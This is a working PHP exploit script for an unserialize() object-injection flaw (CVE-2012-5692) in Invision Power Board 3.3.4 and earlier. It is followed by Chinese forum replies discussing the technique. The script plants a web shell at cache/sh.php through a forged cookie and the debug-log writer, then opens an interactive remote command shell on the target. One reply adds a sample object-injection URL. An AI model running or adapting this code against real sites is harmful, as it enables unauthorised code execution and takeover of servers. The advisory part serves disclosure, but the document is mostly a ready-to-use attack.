<?php
/*
----------------------------------------------------------------
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
----------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: [url]http://www.invisionpower.com/[/url]
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php
4015. static public function get($name)
4016. {
4017. // Check internal data first
4018. if ( isset( self::$_cookiesSet[ $name ] ) )
4019. {
4020. return self::$_cookiesSet[ $name ];
4021. }
4022. else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) )
4023. {
4024. $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ];
4025.
4026. if ( substr( $_value, 0, 2 ) == 'a:' )
4027. {
4028. return unserialize( stripslashes( urldecode( $_value ) ) );
4029. }
The vulnerability is caused due to this method unserialize user input passed through cookies without a proper
sanitization. The only one check is done at line 4026, where is controlled that the serialized string starts
with 'a:', but this is not sufficient to prevent a "PHP Object Injection" because an attacker may send a
serialized string which represents an array of objects. This can be exploited to execute arbitrary PHP code
via the "__destruct()" method of the "dbMain" class, which calls the "writeDebugLog" method to write debug
info into a file. PHP code may be injected only through the $_SERVER['QUERY_STRING'] variable, for this
reason successful exploitation of this vulnerability requires short_open_tag to be enabled.
[-] Disclosure timeline:
[21/10/2012] - Vulnerability discovered
[23/10/2012] - Vendor notified
[25/10/2012] - Patch released: [url]http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-security-update[/url]
[25/10/2012] - CVE number requested
[29/10/2012] - Assigned CVE-2012-5692
[31/10/2012] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+---------------------------------------------------------------------+";
print "\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /ipb/\n";
die();
}
list($host, $path) = array($argv[1], $argv[2]);
$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';
class db_driver_mysql
{
public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}
$payload = urlencode(serialize(array(new db_driver_mysql)));
$phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>';
$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");
while(1)
{
print "\nipb-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
评论11次
学xi一下
学xi下
https://t00ls.net/thread-21022-1-1.html 之前发的,,
不用合体了,你都回复了,反正也是在第一面,只要看帖子肯定能看到回复的
这就是本质的不同,人家国外 研究的是php底层的漏洞 函数的漏洞 所以挖掘的漏洞更多的是每个函数的应用 而国内大部分都是基于逻辑 运用的方式, 比如以前的mail() bypass 用宽字节就可以执行os命令 但是放到国内来在没有公布或是有人研究的情况 这类漏洞也就只能停留在某个层次 所以我认为 本质的代码审计 还是离不开底层的挖掘。 http://packetstormsecurity.org 上就会公布一下 函数的漏洞 以及触发的方式或是溢出 然后就会衍生出一堆的漏洞 比如 Stefan Esser 大牛 貌似还在开发苹果的破解 在国外混学xiphp审计 EgiX也不错 还发现鸟F19ht 不知道是不是国内那个我觉得应该是 ======================================================== unserialize() 利用还是有点难度的记得以前的黑帽大会上公布过这里的exp 实例 在百度上搜的到unserialize() 都会注明 用这个函数的 下面文献里面有详细的内容 函数传递 跟内存的关xi 有点像溢出的感觉 unserialize.php?saved_code=O:7:%22Example%22:1:{s:3:%22var%22;s:10:%22phpinfo%28%29;%22;} 呵呵理解还不是很困难 [ 嘛,亲还是和主楼 合体吧 这个详细点,没意见吧O(∩_∩)O~
序列化的代码执行或者注入,有实际的例子没,哥。
IPB好久木有出过这么犀利的洞子了。。
unserialize可以 代码执行,利用unserialize触发类里面的__construct()等函数, 来利用
Invision Power Board 这个程序还真是第一次看到啊··· 国内好像用的少 ?
而且cookie自己设置的是member_id,而程序里是ipsRegistry::$settings['cookie_id'].$name 。。。
没看太明白,是自己用serialize的方法,把cookie的值更改了,然后程序用unserialize进行反序列化的时候,由于我们改变了值的顺序,导致原来的值被覆盖,然后代码被执行??有更详细的分析吗?